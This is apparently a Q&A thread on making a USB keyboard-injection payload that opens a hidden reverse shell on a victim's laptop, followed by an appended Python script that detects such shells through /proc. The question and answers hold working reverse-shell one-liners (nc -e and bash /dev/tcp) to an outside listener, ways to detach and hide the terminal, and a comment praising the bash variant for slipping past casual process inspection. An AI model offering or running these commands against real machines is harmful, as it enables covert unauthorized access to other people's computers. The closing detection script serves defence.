-1

GOAL: the attacker inserts into a victim's laptop a USB device that acts as a keyboard. The payload opens a terminal, executes a reverse shell and hides the terminal.

PROBLEM: the tests I did locally (Ubuntu 19.04, and a Digispark as the USB device) are the following:

ONE

Terminal A: `nc -e /bin/bash 10.10.10.10 8888`

Terminal B: `nc -vlp 8888`

Everything works: I have my shell with the prompt on terminal B, but terminal A is not hidden.

TWO

Terminal A: `nc -e /bin/bash 10.10.10.10 8888 & disown; exit`

Terminal B: `nc -vlp 8888`

Terminal B just hangs and terminal A is hidden.

THREE

Terminal A: `nohup nc -e /bin/bash 10.10.10.10 8888 & exit`

Terminal B: `nc -vlp 8888`

Terminal B just hangs and terminal A is hidden.

FOUR

Terminal A: I open `screen`, then execute `nc -e /bin/bash 10.10.10.10 8888`, press Ctrl-A then d to detach, and finally `exit`.

Terminal B: `nc -vlp 8888`

Using screen everything works, but I don't want to use screen because it is not installed by default.

QUESTION: is there a way (using preinstalled tools) to hide the terminal without screen but with the same effect?

Maicake
  • Are you sure terminal B just hangs? It could be that bash is not prompting because stdin is not a tty. – Jasen May 09 '20 at 13:39

2 Answers

1

Using just bash with its inbuilt TCP capability:

`bash -il 1<>/dev/tcp/10.10.10.10/8888 2>&1 <&1 & exit`

Or, slightly more user friendly, using `script` from bsdutils to invoke a pty so you can have proper job control etc.:

`script /dev/null 1<>/dev/tcp/10.10.10.10/8888 2>&1 <&1 & exit`
Jasen
-1

This worked. Thanks to @Chris Dodd.

`nohup nc ... & disown; exit`

After the shell exits, the terminal will either log out or shut down (depending on what kind of terminal it is) and send SIGHUP to the controlling process group, which would cause nc to exit.

Using nohup detaches from the terminal and runs nc in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.

Maicake
  • Your nohup contribution is a lot less valuable than @Jasen's bash-fu ... – user2497 May 11 '20 at 12:27
  • Could you explain to me why? – Maicake May 11 '20 at 13:58
  • `ps` listing 'nc' is curious, whereas `bash` is commonly invoked. The owner would need `ps -eww`/netstat/sockstat, or similar (rummage in /proc/) to discover any problem. @Jasen's answer passes at-a-glance inspection, `nc` doesn't. I did not mean to be rude, but why mark your own nohup solution as the answer (nohup tends to drop a nohup.out log too), when @Jasen has made such a simple and excellent answer? – user2497 May 16 '20 at 03:09
  • Because it didn't work simply. And also it is not my solution but from another user. Now I get your point anyway. I'll try again what Jasen suggested. Thanks. – Maicake May 16 '20 at 10:38
  • Perhaps you can use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet – user2497 May 16 '20 at 11:00
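An added detection example (my own code, not from the question or either answer): every variant discussed above, whether the shell is spawned by `nc -e`, opened directly with `bash -il` on `/dev/tcp`, or wrapped in `script`, leaves a process whose fds 0, 1 and 2 all resolve to the same socket inode, which is the `/proc` rummaging the comment above refers to. `stdio_on_socket` checks that pattern on a plain fd map so it can be exercised offline, and `find_socket_shells` walks a live Linux `/proc`; the function names and the constructed `socket:[...]` values are mine.

```python
import os
from typing import Dict, Iterable, Iterator, Optional, Tuple

# Added example, not from the question or answers: flag processes whose
# standard streams all sit on a socket, the footprint every reverse shell
# variant on this page leaves in /proc/<pid>/fd (a normal shell has a pty).
STDIO_FDS = (0, 1, 2)


def stdio_on_socket(fd_targets: Dict[int, str]) -> bool:
    """True when every standard fd that is open resolves to a socket inode.
    fd_targets maps fd number -> readlink() result of /proc/<pid>/fd/<n>,
    e.g. {0: 'socket:[12345]', 1: 'socket:[12345]', 2: 'socket:[12345]'}.
    A closed fd is ignored; a pty, regular file or pipe disqualifies.
    """
    targets = [fd_targets[fd] for fd in STDIO_FDS if fd in fd_targets]
    return bool(targets) and all(t.startswith("socket:") for t in targets)


def read_fd_targets(pid: int) -> Dict[int, str]:
    """Resolve fds 0-2 of a live process via /proc, skipping unreadable ones."""
    out: Dict[int, str] = {}
    for fd in STDIO_FDS:
        try:
            out[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:  # process gone, fd closed, or not our process
            pass
    return out


def read_cmdline(pid: int) -> str:
    # /proc/<pid>/cmdline is NUL-separated; turn it into a readable string
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as fh:
            return fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return ""


def find_socket_shells(pids: Optional[Iterable[int]] = None) -> Iterator[Tuple[int, str]]:
    """Yield (pid, cmdline) for every process whose stdio is wired to a socket."""
    if pids is None:  # default: every numeric entry in /proc
        pids = (int(d) for d in os.listdir("/proc") if d.isdigit())
    for pid in pids:
        if stdio_on_socket(read_fd_targets(pid)):
            yield pid, read_cmdline(pid)


if __name__ == "__main__":
    for pid, cmd in find_socket_shells():
        print(f"{pid:>7}  {cmd}")
```

Run it as root to see other users' processes; the `script` variant shows up as `script` rather than `bash`, since only the outer process holds the socket.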